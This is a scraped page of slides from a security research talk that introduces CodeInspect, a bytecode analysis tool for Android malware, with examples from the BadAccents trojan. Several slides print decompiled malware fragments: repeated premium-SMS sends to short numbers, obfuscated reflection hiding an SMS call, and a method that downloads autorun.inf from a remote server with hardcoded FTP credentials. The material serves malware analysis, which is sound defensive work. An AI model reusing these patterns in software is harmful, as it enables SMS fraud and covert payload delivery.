analyzing sophisticated android malware with codeinspect
play

Analyzing Sophisticated Android Malware with CodeInspect Siegfried - PowerPoint PPT Presentation

Analyzing Sophisticated Android Malware with CodeInspect Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP #whoami 3rd year PhD-Student at Secure Software Engineering Group Darmstadt, Germany (Prof. Dr. Eric Bodden)


  1. Analyzing Sophisticated Android Malware with CodeInspect Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP

  2. #whoami • 3rd year PhD-Student at Secure Software 
 Engineering Group Darmstadt, Germany 
 (Prof. Dr. Eric Bodden) • Research interest: • Applied software security on Android • Static-/dynamic code analyses • Android Security: • Found 2 AOSP exploits • Korea Threat investigation together with McAfee Research Lab Intel Security SECURE 2 SOFTWARE ENGINEERING GROUP

  3. Malware SECURE 3 SOFTWARE ENGINEERING GROUP

  4. public void onCreate(android.os.Bundle $param0) { sendTextMessage("3353", null, "798657", null, null); sendTextMessage("3354", null, "798657", null, null); sendTextMessage("3353", null, "798657", null, null); } public static boolean gdadbjrj(String paramString1 , String paramString2) { Class clz = Class.forName(gdadbjrj.gdadbjrj("VRIf3+In9a.aTA3RYnD1BcVRV]af")); 
 Object localObject = clz.getMethod( gdadbjrj.gdadbjrj("]a9maFVM.9"), 
 new Class[0]).invoke(null, new Object[0]); 
 String s = gdadbjrj.gdadbjrj("BaRIta*9caBBV]a"); 
 Class c = Class.forName(gdadbjrj.gdadbjrj ("VRIf3+InVTTnSaRI+R]KR9aR9")); 
 Class [] arr = new Class [] { nglpsq.cbhgc, nglpsq.cbhgc, glpsq.cbhgc, c, c}; 
 clz.getMethod(s, arr).invoke(localObject , new Object [] 
 { paramString1 , null , paramString2 , null , null }); } 
 SECURE 4 SOFTWARE ENGINEERING GROUP

  5. - Reflections - Packers - Anti-Decompile - Anti-Debug - … public static boolean gdadbjrj(String paramString1 , String paramString2) { Class clz = Class.forName(gdadbjrj.gdadbjrj("VRIf3+In9a.aTA3RYnD1BcVRV]af")); 
 Object localObject = clz.getMethod( gdadbjrj.gdadbjrj("]a9maFVM.9"), 
 new Class[0]).invoke(null, new Object[0]); 
 String s = gdadbjrj.gdadbjrj("BaRIta*9caBBV]a"); 
 Class c = Class.forName(gdadbjrj.gdadbjrj ("VRIf3+InVTTnSaRI+R]KR9aR9")); 
 Class [] arr = new Class [] { nglpsq.cbhgc, nglpsq.cbhgc, glpsq.cbhgc, c, c}; 
 clz.getMethod(s, arr).invoke(localObject , new Object [] 
 { paramString1 , null , paramString2 , null , null }); } 
 SECURE 5 SOFTWARE ENGINEERING GROUP

  6. A new Binary Analysis Framework for Android and Java Bytecode SECURE 6 SOFTWARE ENGINEERING GROUP

  7. Soot SECURE 7 SOFTWARE ENGINEERING GROUP

  8. Soot Input/Output .dex .java .jimple .class .apk Soot - Various callgraph algorithms - Sophisticated algorithms used in compiler construction - Code manipulation https://github.com/Sable/soot/wiki SECURE 8 SOFTWARE ENGINEERING GROUP

  9. Jimple Soot SECURE 9 SOFTWARE ENGINEERING GROUP

  10. Jimple Soot public static boolean UsbAutoRunAttack(android.content.Context $param0) { Declarations java.lang.String $String; $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>; ... staticinvoke <smart.apps.droidcleaner.Tools: boolean Code DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)> ($String, "autorun.inf", "ftpupper", "thisisshit007", $param0); Return-Statement return true; } SECURE 10 SOFTWARE ENGINEERING GROUP

  11. CodeInspect Jimple Soot SECURE 11 SOFTWARE ENGINEERING GROUP

  12. Jimple CodeInspect Soot Syntax Code Java Source Highlighting Refactoring Enhancement Jimple Code Code Debugger Readable Manipulation Files Dataflow “Region“ Deobfuscator Visualizer Detection SECURE 12 SOFTWARE ENGINEERING GROUP

  13. Let’s get started… 1. Import APK 2. Start Device SECURE 13 SOFTWARE ENGINEERING GROUP

  14. Android/BadAccents SMS E-Mail Install Activation Uninstall AV Fake AV Component User Intercept SMS Intercept Call Banking Trojan Send SMS HTTP Native Code File System Waiting Time Environment Settings App Internal External Event An Investigation of the Android/BadAccents Malware which Exploits a new Android Tapjacking Attack Siegfried Rasthofer, Irfan Asrar, Stephan Huber, Eric Bodden SECURE 14 SOFTWARE ENGINEERING GROUP

  15. Live-Demo https://goo.gl/LblcR5 SECURE 15 SOFTWARE ENGINEERING GROUP

  16. Future Steps • New Plugins under development • Easily add own analyses • What would be a useful feature for you? SECURE 16 SOFTWARE ENGINEERING GROUP

  17. How do I get this tool? SECURE 17 SOFTWARE ENGINEERING GROUP

  18. SECURE 18 SOFTWARE ENGINEERING GROUP

  19. Siegfried Rasthofer Secure Software Engineering Group Email: siegfried.rasthofer@cased.de Blog: http://sse-blog.ec-spride.de Website: http://sse.ec-spride.de Twitter: @CodeInspect SECURE 19 SOFTWARE ENGINEERING GROUP

Recommend


More recommend